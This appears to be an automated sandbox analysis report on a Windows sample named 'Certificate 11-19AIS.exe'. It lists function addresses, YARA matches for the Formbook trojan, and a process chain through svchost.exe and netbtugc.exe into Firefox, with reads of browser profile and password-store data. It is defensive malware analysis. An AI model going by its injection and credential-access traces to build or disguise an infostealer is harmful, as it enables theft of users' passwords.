            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307A3524_2_0307A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030803E64_2_030803E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FCE3F04_2_02FCE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030602744_2_03060274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030402C04_2_030402C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0305A1184_2_0305A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030481584_2_03048158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030801AA4_2_030801AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030741A24_2_030741A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030781CC4_2_030781CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030520004_2_03052000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FB01004_2_02FB0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FDC6E04_2_02FDC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FBC7C04_2_02FBC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC07704_2_02FC0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FE47504_2_02FE4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030805914_2_03080591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030644204_2_03064420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030724464_2_03072446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC05354_2_02FC0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0306E4F64_2_0306E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307AB404_2_0307AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FBEA804_2_02FBEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03076BD74_2_03076BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FEE8F04_2_02FEE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FA68B84_2_02FA68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0308A9A64_2_0308A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FCA8404_2_02FCA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC28404_2_02FC2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC29A04_2_02FC29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FD69624_2_02FD6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03002F284_2_03002F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03062F304_2_03062F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03034F404_2_03034F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FD2E904_2_02FD2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0303EFA04_2_0303EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC0E594_2_02FC0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FCCFE04_2_02FCCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307EE264_2_0307EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FB2FC84_2_02FB2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307CE934_2_0307CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FE0F304_2_02FE0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307EEDB4_2_0307EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FB0CF24_2_02FB0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0305CD1F4_2_0305CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC0C004_2_02FC0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FBADE04_2_02FBADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FD8DBF4_2_02FD8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03060CB54_2_03060CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FCAD004_2_02FCAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307132D4_2_0307132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FDB2C04_2_02FDB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC52A04_2_02FC52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0300739A4_2_0300739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FAD34C4_2_02FAD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030612ED4_2_030612ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC70C04_2_02FC70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0308B16B4_2_0308B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FCB1B04_2_02FCB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FAF1724_2_02FAF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF516C4_2_02FF516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0306F0CC4_2_0306F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307F0E04_2_0307F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030770E94_2_030770E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307F7B04_2_0307F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030056304_2_03005630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030716CC4_2_030716CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030775714_2_03077571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FB14604_2_02FB1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0305D5B04_2_0305D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_030895C34_2_030895C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307F43F4_2_0307F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307FB764_2_0307FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03035BF04_2_03035BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FFDBF94_2_02FFDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03077A464_2_03077A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307FA494_2_0307FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03033A6C4_2_03033A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FDFB804_2_02FDFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03005AA04_2_03005AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03061AA34_2_03061AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0305DAAC4_2_0305DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0306DAC64_2_0306DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC38E04_2_02FC38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0302D8004_2_0302D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC99504_2_02FC9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FDB9504_2_02FDB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307FF094_2_0307FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC9EB04_2_02FC9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307FFB14_2_0307FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F83FD24_2_02F83FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F83FD54_2_02F83FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC1F924_2_02FC1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03071D5A4_2_03071D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03077D734_2_03077D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03039C324_2_03039C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FDFDC04_2_02FDFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FC3D404_2_02FC3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0307FCF24_2_0307FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028215E04_2_028215E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281C7C74_2_0281C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281C7D04_2_0281C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281AA704_2_0281AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281C9F04_2_0281C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028230EE4_2_028230EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028230F04_2_028230F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02839FD04_2_02839FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0A0AF4_2_02E0A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B8B44_2_02E0B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B9D64_2_02E0B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0ADD84_2_02E0ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0BD6C4_2_02E0BD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02FAB970 appears 279 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0302EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03007E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02FF5130 appears 50 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0303F290 appears 105 times
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: String function: 007CEC2F appears 68 times
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: String function: 007DF8A0 appears 35 times
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: String function: 007D6AC0 appears 42 times
            Source: Certificate 11-19AIS.exe, 00000000.00000003.1314591287.0000000003803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-19AIS.exe
            Source: Certificate 11-19AIS.exe, 00000000.00000003.1314740603.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-19AIS.exe
            Source: Certificate 11-19AIS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FCE7A GetLastError,FormatMessageW,0_2_007FCE7A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EAB84 AdjustTokenPrivileges,CloseHandle,0_2_007EAB84
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007EB134
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007FE1FD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_007F6532
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0080C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0080C18C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007B406B
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeFile created: C:\Users\user\AppData\Local\Temp\autBBDF.tmpJump to behavior
            Source: Certificate 11-19AIS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B90000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1652002550.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1654002806.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 11-19AIS.exeReversingLabs: Detection: 71%
            Source: unknownProcess created: C:\Users\user\Desktop\Certificate 11-19AIS.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"Jump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
